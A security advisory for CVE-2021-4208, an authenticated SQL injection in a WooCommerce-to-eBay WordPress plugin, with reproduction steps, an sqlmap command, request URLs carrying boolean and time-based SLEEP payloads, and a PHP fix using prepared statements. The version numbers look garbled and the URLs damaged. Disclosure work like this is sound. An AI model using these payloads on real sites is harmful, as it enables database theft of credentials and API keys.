CVSS: 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)
Nov 21, 2021: Issue Identified and Disclosed to WP plugin team
Nov 22, 2021: Got auto reply and plugin closed
December 27, 2021: Submitted to MITRE for CVE
January 20, 2022: Got reply from MITRE saying to ping WPScan; pinged WPScan
January 21, 2021: CVE assigned (CVE-2021-4208)
February 21, 2022: CVE Published in NVD
February 28, 2022: CVE updated with score
The ExportFeed: List WooCommerce Products on eBay Store plugin 188.8.131.52 uses a `product_id` POST parameter which is not properly sanitized for use in an SQL statement, leading to a SQL injection vulnerability.
SQL injection vulnerability in fetch_product_ajax.php in Exportfeed List WooCommerce Products on eBay Store WordPress plugin 1.1.0 through 184.108.40.206 allows authenticated attackers to execute arbitrary SQL commands via the product_id POST parameter.
The problematic code is in fetch_product_ajax.php.
This vulnerability is present in the current version of the plugin 220.127.116.11 and appears to also be present back to version 1.1.0. Administrative access is required to access the vulnerable functionality.
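The class of bug described above, as an added example that is not the plugin's own code: the page does not show the query, so the vulnerable shape, the nonce action name and the capability checked are assumptions. It puts an unsanitized `product_id` concatenated into SQL next to the same lookup bound through `$wpdb->prepare()`.

```php
<?php
// Added example, not code from the plugin. The actual query in
// fetch_product_ajax.php is not shown on the page; the shape below is an
// assumption that matches the description (unsanitized product_id POST value
// used in an SQL statement).

// Vulnerable pattern: the raw POST value becomes part of the SQL text, so a
// value such as "1 AND (SELECT ... SLEEP(5) ...)" is executed by MySQL.
function fetch_product_vulnerable( $wpdb ) {
    $product_id = $_POST['product_id'];
    $sql = "SELECT * FROM {$wpdb->posts} WHERE ID = " . $product_id
         . " AND post_type = 'product'";
    return $wpdb->get_row( $sql );
}

// Hardened form: reject anything that is not a plain integer, then bind the
// value with $wpdb->prepare() so it can only ever reach the statement as a
// number. The time-based and boolean payloads the advisory shows are rejected
// before any query runs.
function fetch_product_hardened( $wpdb ) {
    if ( ! isset( $_POST['product_id'] )
        || ! ctype_digit( (string) $_POST['product_id'] ) ) {
        return null;
    }
    $product_id = (int) $_POST['product_id'];
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->posts} WHERE ID = %d AND post_type = %s",
        $product_id,
        'product'
    );
    return $wpdb->get_row( $sql );
}

// Minimal admin-ajax handler showing where the request checks belong.
// 'example_nonce_action' and the WooCommerce capability are assumptions;
// the request already carries a 'security' nonce parameter, which is what
// check_ajax_referer() validates here.
function example_fetch_product_ajax() {
    global $wpdb;
    check_ajax_referer( 'example_nonce_action', 'security' ); // dies on bad nonce
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    wp_send_json_success( fetch_product_hardened( $wpdb ) );
}
```

Note that the nonce and capability checks limit who can reach the handler but do not replace parameter binding: the advisory's attacker is already an administrator, so only the prepared statement actually closes the injection.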
Link to plugin:
Steps to reproduce:
- Log into WordPress as the admin user
- Install WooCommerce and 'ExportFeed: List WooCommerce Products on eBay Store' plugins
- Perform initial config for the WooCommerce plugin and create a product
- Perform initial config for the ExportFeed plugin and create an eBay Connect (Create Feed will not work without this)
- In the ExportFeed plugin settings, go to Create Feed and click Custom Product Feed, search for a product and capture the request with an intercepting proxy.
- Modify the original request parameters so we hit the appropriate functionality
- Save the request to a file, post.txt
- Run sqlmap to pull the current user:
sqlmap -r post.txt --dbms=mysql --current-user --keep-alive --level=3 --risk=3 -p product_id --threads=5 --flush-session
https://test0.local/wp-admin/admin-ajax.php?action=gcpf_cart_product&feedpath=core/ajax/Wp/fetch_product_ajax.phpaaction=ebcpf_ebayseller_handles&security=1c6e01b2a4&category=fisku=snakefimerchat_type=eBaySeller&service_name=eBaySeller&showOutofStock=1&1imit=0,105q=savepalocal_cat_ids=18product_id=1 AND 3082:3082
https://test0.local/wp-admin/admin-ajax.php?action=gcpf_cart_product&feedpath=core/ajax/wp/fetch_product_ajax.phpfiaction=ebcpf_ebayseller_handles&security=1c6e01b2a4&category=fisku=snakefimerchat_type=eBaySeller&service_name=eBaySellerashowOutofStock=lalimit=0,108q=savepfilocal_cat_ids=1&product_id=1 AND (SELECT 9979 FROM (SELECT(SLEEP(5)))Ing)
Using this technique, we can also (slowly) dump the entire contents of the database, including the key for the ebay connection this plugin uses, WordPress users, and so on.